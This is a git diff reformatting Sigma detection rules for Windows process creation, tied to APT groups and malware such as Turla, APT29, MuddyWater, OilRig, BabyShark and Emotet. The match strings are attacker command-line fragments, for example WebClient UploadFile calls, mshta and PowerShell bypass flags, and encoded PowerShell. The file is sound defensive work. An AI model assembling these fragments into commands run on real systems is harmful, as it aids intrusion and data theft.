diff --git a/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
index 38a045865..7464fa4f8 100644
--- a/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
+++ b/sigma/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml
@@ -1,8 +1,7 @@
title: Ps.exe Renamed SysInternals Tool
id: 18da1007-3f26-470f-875d-f77faf1cab31
status: test
-description: Detects renamed SysInternals tool execution with a binary named ps.exe
- as used by Dragonfly APT group and documented in TA17-293A report
+description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
references:
- https://www.us-cert.gov/ncas/alerts/TA17-293A
author: Florian Roth (Nextron Systems)
@@ -22,7 +21,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ps.exe -accepteula
- -s cmd /c netstat
condition: process_creation and selection
diff --git a/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
index a10b5337a..d20bd4338 100644
--- a/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
+++ b/sigma/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml
@@ -1,8 +1,7 @@
title: Lazarus System Binary Masquerading
id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
status: test
-description: Detects binaries used by the Lazarus group which use system names but
- are executed and launched from non-default location
+description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
references:
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
@@ -20,11 +19,11 @@ detection:
EventID: 4688
Channel: Security
selection:
- NewProcessName|endswith:
+ NewProcessName|endswith:
- \msdtc.exe
- \gpsvc.exe
filter:
- NewProcessName|startswith:
+ NewProcessName|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
condition: process_creation and (selection and not filter)
diff --git a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml
index d6f536ded..aa7b7a3a4 100644
--- a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml
+++ b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml
@@ -1,8 +1,7 @@
title: Turla Service Install
id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
status: test
-description: This method detects a service install of malicious services mentioned
- in Carbon Paper - Turla report by ESET
+description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
references:
- https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml
index a56ab7663..47e6633a7 100644
--- a/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml
+++ b/sigma/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml
@@ -1,8 +1,7 @@
title: Turla PNG Dropper Service
id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
status: test
-description: This method detects malicious services mentioned in Turla PNG dropper
- report by NCC Group in November 2018
+description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
references:
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
index dd582557d..57766516e 100644
--- a/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
+++ b/sigma/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml
@@ -23,17 +23,17 @@ detection:
EventID: 4688
Channel: Security
selection_other_svchost:
- NewProcessName|endswith: \Microsoft\Network\svchost.exe
+ NewProcessName|endswith: \Microsoft\Network\svchost.exe
selection_other_del:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- \Windows\Caches\NavShExt.dll
- /c del
selection_dll_path:
- CommandLine|endswith:
+ CommandLine|endswith:
- \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll
- \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
selection_dll_function:
- CommandLine|contains: ',Setting'
+ CommandLine|contains: ',Setting'
condition: process_creation and (1 of selection_other_* or all of selection_dll_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
index d4c2134f8..8faf6d754 100644
--- a/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml
@@ -1,8 +1,7 @@
title: APT27 - Emissary Panda Activity
id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
status: test
-description: Detects the execution of DLL side-loading malware used by threat group
- Emissary Panda aka APT27
+description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
references:
- https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
- https://twitter.com/cyb3rops/status/1168863899531132929
@@ -24,11 +23,11 @@ detection:
Channel: Security
selection_sllauncher:
ParentProcessName|endswith: \sllauncher.exe
- NewProcessName|endswith: \svchost.exe
+ NewProcessName|endswith: \svchost.exe
selection_svchost:
- CommandLine|contains: -k
+ CommandLine|contains: -k
ParentProcessName|contains: \AppData\Roaming\
- NewProcessName|endswith: \svchost.exe
+ NewProcessName|endswith: \svchost.exe
condition: process_creation and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
index c3ce3a0fd..53137427f 100644
--- a/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml
@@ -25,18 +25,18 @@ detection:
EventID: 4688
Channel: Security
selection_path:
- CommandLine|contains:
+ CommandLine|contains:
- '%LOCALAPPDATA%'
- \AppData\Local\
- NewProcessName|endswith: \rundll32.exe
+ NewProcessName|endswith: \rundll32.exe
selection_extensions:
- - CommandLine|contains: .dat",
- - CommandLine|endswith:
- - '.dll #1'
- - '.dll" #1'
- - .dll",#1
+ - CommandLine|contains: .dat",
+ - CommandLine|endswith:
+ - '.dll #1'
+ - '.dll" #1'
+ - .dll",#1
filter_main_exclude_temp:
- CommandLine|contains: \AppData\Local\Temp\
+ CommandLine|contains: \AppData\Local\Temp\
condition: process_creation and (all of selection_* and not 1 of filter_main_*)
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
index 60cc039e3..eaf3596f7 100644
--- a/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml
@@ -1,11 +1,10 @@
title: APT29 2018 Phishing Campaign CommandLine Indicators
id: 7453575c-a747-40b9-839b-125a0aae324b
related:
- - id: 033fe7d6-66d1-4240-ac6b-28908009c71f
- type: obsoletes
+ - id: 033fe7d6-66d1-4240-ac6b-28908009c71f
+ type: obsoletes
status: stable
-description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported
- by mandiant
+description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
references:
- https://twitter.com/DrunkBinary/status/1063075530180886529
- https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
@@ -25,10 +24,10 @@ detection:
EventID: 4688
Channel: Security
selection:
- - CommandLine|contains: -noni -ep bypass $
- - CommandLine|contains|all:
- - cyzfc.dat,
- - PointFunctionCall
+ - CommandLine|contains: -noni -ep bypass $
+ - CommandLine|contains|all:
+ - cyzfc.dat,
+ - PointFunctionCall
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
index 8b3523f31..fe8c82050 100644
--- a/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml
@@ -19,19 +19,19 @@ detection:
EventID: 4688
Channel: Security
selection_mshta:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- vbscript:Close(Execute("CreateObject(
- powershell
- -w 1 -exec Bypass
- \ProgramData\
selection_survey:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- Win32_OperatingSystem
- Win32_NetworkAdapterConfiguration
- root\SecurityCenter2
- '[System.Net.DNS]'
selection_pwsh_backdoor:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- '[Convert]::ToBase64String'
- '[System.Text.Encoding]::UTF8.GetString]'
- GetResponse().GetResponseStream()
diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
index f17b72dc4..643823ade 100644
--- a/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml
@@ -1,18 +1,17 @@
title: OilRig APT Activity
id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
related:
- - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
- type: similar
- - id: c0580559-a6bd-4ef6-b9b7-83703d98b561
- type: similar
- - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
- type: similar
+ - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
+ type: similar
+ - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
+ type: similar
+ - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
+ type: similar
status: test
description: Detects OilRig activity as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
-author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018/03/23
modified: 2023/03/08
tags:
@@ -34,19 +33,19 @@ detection:
EventID: 4688
Channel: Security
selection_schtasks:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- SC Scheduled Scan
- \microsoft\Taskbar\autoit3.exe
selection_temp:
- NewProcessName|contains: \Windows\Temp\DB\
- NewProcessName|endswith: .exe
+ NewProcessName|contains: \Windows\Temp\DB\
+ NewProcessName|endswith: .exe
selection_service:
- CommandLine|contains:
+ CommandLine|contains:
- i
- u
- NewProcessName: C:\Windows\system32\Service.exe
+ NewProcessName: C:\Windows\system32\Service.exe
selection_autoit:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- nslookup.exe
- -q=TXT
ParentProcessName|endswith: \local\microsoft\Taskbar\autoit3.exe
diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml
index b29644850..ebee13389 100644
--- a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml
@@ -1,19 +1,17 @@
title: OilRig APT Schedule Task Persistence - Security
id: c0580559-a6bd-4ef6-b9b7-83703d98b561
related:
- - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
- type: similar
- - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
- type: similar
- - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
- type: similar
+ - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
+ type: similar
+ - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
+ type: similar
+ - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation
+ type: similar
status: test
-description: Detects OilRig schedule task persistence as reported by Nyotron in their
- March 2018 report
+description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
-author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018/03/23
modified: 2023/03/08
tags:
diff --git a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml
index b7005f6d8..608674039 100644
--- a/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml
@@ -1,19 +1,17 @@
title: OilRig APT Schedule Task Persistence - System
id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
related:
- - id: c0580559-a6bd-4ef6-b9b7-83703d98b561
- type: similar
- - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
- type: similar
- - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
- type: similar
+ - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
+ type: similar
+ - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
+ type: similar
+ - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation
+ type: similar
status: experimental
-description: Detects OilRig schedule task persistence as reported by Nyotron in their
- March 2018 report
+description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
-author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy,
- oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018/03/23
modified: 2023/03/08
tags:
diff --git a/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
index b59101b64..ca39ec945 100644
--- a/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml
@@ -1,8 +1,7 @@
title: Defrag Deactivation
id: 958d81aa-8566-4cea-a565-59ccd4df27b0
status: test
-description: Detects the deactivation and disabling of the Scheduled defragmentation
- task as seen by Slingshot APT group
+description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
references:
- https://securelist.com/apt-slingshot/84312/
author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
@@ -21,13 +20,13 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- /delete
- /change
- CommandLine|contains|all:
+ CommandLine|contains|all:
- /TN
- \Microsoft\Windows\Defrag\ScheduledDefrag
- NewProcessName|endswith: \schtasks.exe
+ NewProcessName|endswith: \schtasks.exe
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml b/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml
index 9df4cb0b8..f50398291 100644
--- a/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml
@@ -1,11 +1,10 @@
title: Defrag Deactivation - Security
id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7
related:
- - id: 958d81aa-8566-4cea-a565-59ccd4df27b0
- type: derived
+ - id: 958d81aa-8566-4cea-a565-59ccd4df27b0
+ type: derived
status: test
-description: Detects the deactivation and disabling of the Scheduled defragmentation
- task as seen by Slingshot APT group
+description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
references:
- https://securelist.com/apt-slingshot/84312/
author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
diff --git a/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
index 2df07b072..a44892193 100644
--- a/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
+++ b/sigma/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml
@@ -1,8 +1,7 @@
title: TropicTrooper Campaign November 2018
id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
status: stable
-description: Detects TropicTrooper activity, an actor who targeted high-profile organizations
- in the energy and food and beverage sectors in Asia
+description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
references:
- https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
author: '@41thexplorer, Microsoft Defender ATP'
@@ -20,7 +19,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc
+ CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc
condition: process_creation and selection
level: high
ruletype: Sigma
diff --git a/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
index c0de09e81..7fe19772e 100644
--- a/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
+++ b/sigma/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml
@@ -1,8 +1,7 @@
title: Potential BearLPE Exploitation
id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
status: test
-description: Detects potential exploitation of the BearLPE exploit using Task Scheduler
- ".job" import arbitrary DACL write\par
+description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
references:
- https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp
author: Olaf Hartong
@@ -21,10 +20,10 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith: \schtasks.exe
- - OriginalFileName: schtasks.exe
+ - NewProcessName|endswith: \schtasks.exe
+ - OriginalFileName: schtasks.exe
selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- /change
- /TN
- /RU
diff --git a/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
index 8f316ab30..f51deb85f 100644
--- a/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
+++ b/sigma/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml
@@ -1,8 +1,7 @@
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
-description: Detects an exploitation attempt in which the UAC consent dialogue is
- used to invoke an Internet Explorer process running as LOCAL_SYSTEM
+description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
- https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
@@ -22,13 +21,13 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains: ' http'
+ CommandLine|contains: ' http'
ParentProcessName|endswith: \consent.exe
- NewProcessName|endswith: \iexplore.exe
+ NewProcessName|endswith: \iexplore.exe
rights1:
MandatoryLabel: S-1-16-16384
rights2:
- SubjectUserName|contains:
+ SubjectUserName|contains: # covers many language settings
- AUTHORI
- AUTORI
condition: process_creation and (selection and ( rights1 or rights2 ))
diff --git a/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
index 05c2aa751..6f56ab7b3 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml
@@ -24,14 +24,13 @@ detection:
EventID: 4688
Channel: Security
selection:
- - CommandLine|contains|all:
- - powershell.exe mshta.exe http
- - .hta
- - CommandLine|contains:
- - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server
- Client\Default"
- - cmd.exe /c taskkill /im cmd.exe
- - (New-Object System.Net.WebClient).UploadFile('http
+ - CommandLine|contains|all:
+ - powershell.exe mshta.exe http
+ - .hta
+ - CommandLine|contains:
+ - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
+ - cmd.exe /c taskkill /im cmd.exe
+ - (New-Object System.Net.WebClient).UploadFile('http
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
index 823efd167..17f16035e 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml
@@ -5,8 +5,7 @@ description: Detects potential Dridex acitvity via specific process patterns
references:
- https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
- https://redcanary.com/threat-detection-report/threats/dridex/
-author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron
- Systems)
+author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019/01/10
modified: 2023/02/03
tags:
@@ -25,33 +24,31 @@ detection:
EventID: 4688
Channel: Security
selection_svchost:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- C:\Users\
- \Desktop\
- NewProcessName|endswith: \svchost.exe
+ NewProcessName|endswith: \svchost.exe
filter_svchost:
ParentProcessName|startswith: C:\Windows\System32\
selection_regsvr:
- CommandLine|contains:
+ CommandLine|contains:
- ' -s '
- \AppData\Local\Temp\
ParentProcessName|endswith: \excel.exe
- NewProcessName|endswith: \regsvr32.exe
+ NewProcessName|endswith: \regsvr32.exe
filter_regsvr:
- CommandLine|contains: .dll
+ CommandLine|contains: .dll
selection_anomaly_parent:
ParentProcessName|endswith: \svchost.exe
selection_anomaly_child_1:
- CommandLine|contains: ' /all'
- NewProcessName|endswith: \whoami.exe
+ CommandLine|contains: ' /all'
+ NewProcessName|endswith: \whoami.exe
selection_anomaly_child_2:
- CommandLine|contains: ' view'
- NewProcessName|endswith:
+ CommandLine|contains: ' view'
+ NewProcessName|endswith:
- \net.exe
- \net1.exe
- condition: process_creation and ((selection_svchost and not filter_svchost) or
- (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and
- 1 of selection_anomaly_child_*))
+ condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*))
falsepositives:
- Unlikely
level: critical
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
index 69f8e0921..2229c4279 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml
@@ -23,15 +23,15 @@ detection:
EventID: 4688
Channel: Security
selection_ping:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- 'ping -n '
- ' echo EEEE > '
selection_ipconfig:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- ipconfig /all
- \temp\res.ip
selection_netsh:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- interface ip show config
- \temp\netsh.res
condition: process_creation and (1 of selection_*)
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
index 7dcca551e..6681a803f 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml
@@ -1,8 +1,7 @@
title: Potential Emotet Activity
id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18
status: stable
-description: Detects all Emotet like process executions that are not covered by the
- more generic rules
+description: Detects all Emotet like process executions that are not covered by the more generic rules
references:
- https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/
- https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/
@@ -25,20 +24,20 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- ' -e* PAA'
- - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ
- - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA
- - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA
- - IgAoACcAKgAnACkAOwAkA
- - IAKAAnACoAJwApADsAJA
- - iACgAJwAqACcAKQA7ACQA
+ - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile
+ - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile
+ - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile
+ - IgAoACcAKgAnACkAOwAkA # "('*');$
+ - IAKAAnACoAJwApADsAJA # "('*');$
+ - iACgAJwAqACcAKQA7ACQA # "('*');$
- JABGAGwAeAByAGgAYwBmAGQ
- - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA
- - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA
- - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA
+ - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+(
+ - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+(
+ - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+(
filter:
- CommandLine|contains:
+ CommandLine|contains:
- fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ
- wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA
